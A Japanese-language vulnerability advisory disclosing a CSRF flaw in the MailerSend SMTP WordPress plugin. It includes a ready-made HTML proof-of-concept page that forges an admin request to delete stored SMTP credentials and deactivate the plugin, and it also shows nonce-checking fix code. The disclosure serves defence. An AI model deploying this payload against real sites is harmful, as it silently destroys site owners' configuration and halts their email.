
[!IMPORTANT] 概要: WordPress用公式MailerSend SMTP Integrationプラグイン(
< 1.0.8)において、高重大度のクロスサイトリクエストフォージェリ(CSRF)脆弱性(CVE-2026-13156)が発見されました。設定削除ハンドラmailersend_handle_configuration_delete()は管理権限(manage_options)をチェックしますが、WordPressのNonce検証(check_admin_referer())を完全に欠いています。攻撃者は認証済みWordPress管理者を標的とした悪意のあるクロスオリジンリクエストを作成し、保存されたSMTP認証情報をサイレントに消去し、プラグインの強制無効化を引き起こすことができます。その結果、すべてのメールワークフローが完全に停止するアプリケーションサービス拒否状態に陥ります。
CVE-2026-13156 (WPScan Advisory ID: 595e653d-0904-43cf-8e61-d684599de11b)1.0.8未満 (< 1.0.8)研究者について:
Huynh Kien Minh (Huỳnh Kiến Minh) は、積極的なサイバーセキュリティ研究者および脆弱性アナリストであり、徹底したセキュリティ評価と責任ある情報開示(CVE-2026-13156 の技術的詳細を含む)で知られています。また、重大なセキュリティ脆弱性を発見・開示したことにより、Proton Security Hall of Fame に公式に認定され表彰されています。
この技術勧告の確認、概念実証分析の探索、研究者との連絡については、以下をご利用ください:
WordPress用MailerSend Official SMTP Integrationプラグイン(バージョン1.0.8未満)は、管理画面からトリガーされた際に保存済みAPIトークンを消去し、SMTP設定オプション(wp_options)をクリアし、プラグインを無効化することを意図した管理アクション(configuration-delete)を登録しています。
このエンドポイントはアクティブユーザーがmanage_options権限を持っているか(つまりリクエストが管理者セッションから発信されているか)を検証しますが、WordPressのnonce(check_admin_referer() または wp_verify_nonce())検証を実行していません。
Nonce検証がないHTTPリクエストは、意図的な管理者のクリックと偽造されたクロスオリジンリクエストを区別できないため、認証された管理者が読み込んだ外部サイトがconfiguration-deleteアクションを静かにトリガーする可能性があります。
< 1.0.8)を利用しているターゲットWordPressサイトを特定します。/wp-admin/admin-post.php または /wp-admin/admin.php?page=mailersend&action=configuration-delete)を狙った自動送信フォームを含む悪意のあるHTML/JavaScriptページを作成します。[!WARNING] 倫理的免責事項: 以下のHTMLクロスサイトリクエストフォージェリ(CSRF)概念実証ペイロードは、Huynh Kien Minh による倫理的な開示プロトコルの下、教育目的、防御的検証、およびセキュリティ監査のためにのみ提供されています。許可なくターゲットに対して実行しないでください。
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CVE-2026-13156 PoC — MailerSend SMTP Configuration Deletion via CSRF</title>
<!-- Author: Huynh Kien Minh (https://minhhk.web.app/) -->
</head>
<body>
<h2>CVE-2026-13156 — CSRF Verification PoC</h2>
<p>If an authenticated WordPress Administrator visits this page, the MailerSend SMTP configuration will be deleted and the plugin deactivated.</p>
<!-- Forged Request targeting the vulnerable MailerSend configuration deletion endpoint -->
<form id="csrfPoC" action="http://target-wordpress-site.local/wp-admin/admin.php" method="GET">
<input type="hidden" name="page" value="mailersend-smtp" />
<input type="hidden" name="action" value="configuration-delete" />
<!-- Notice: No valid _wpnonce token is required due to the vulnerability -->
<input type="submit" value="Execute PoC (Simulate Attack)" />
</form>
<script>
// Automatically submit the forged request when the administrator loads the page
document.addEventListener("DOMContentLoaded", function() {
console.log("[CVE-2026-13156] Executing CSRF Payload developed by Huynh Kien Minh...");
// Uncomment line below to enable auto-execution in lab environments:
// document.getElementById('csrfPoC').submit();
});
</script>
</body>
</html>
1.0.8 以上に更新してください。WordPressプラグインにおける管理状態変更アクションを適切に保護するには、リクエスト処理前に厳格なNonce検証を実施する必要があります:
// Secure Implementation (Version 1.0.8+)
function mailersend_delete_configuration_handler() {
// 1. Check User Capability
if ( ! current_user_can( 'manage_options' ) ) {
wp_die( __( 'Unauthorized access.', 'mailersend' ), 403 );
}
// 2. REQUIRED: Verify CSRF Nonce Token
if ( ! isset( $_GET['_wpnonce'] ) || ! wp_verify_nonce( $_GET['_wpnonce'], 'mailersend_delete_config_nonce' ) ) {
wp_die( __( 'Security check failed (CSRF attempt blocked).', 'mailersend' ), 403 );
}
// 3. Proceed safely with configuration deletion
delete_option( 'mailersend_smtp_settings' );
deactivate_plugins( plugin_basename( __FILE__ ) );
wp_redirect( admin_url( 'plugins.php?deactivated=true' ) );
exit;
}
このリポジトリおよび技術勧告は、より安全なグローバルなWordPressおよびサイバーセキュリティエコシステムを育成するため、責任ある開示ガイドラインに基づいて Huynh Kien Minh (MinhHK) により管理・公開されています。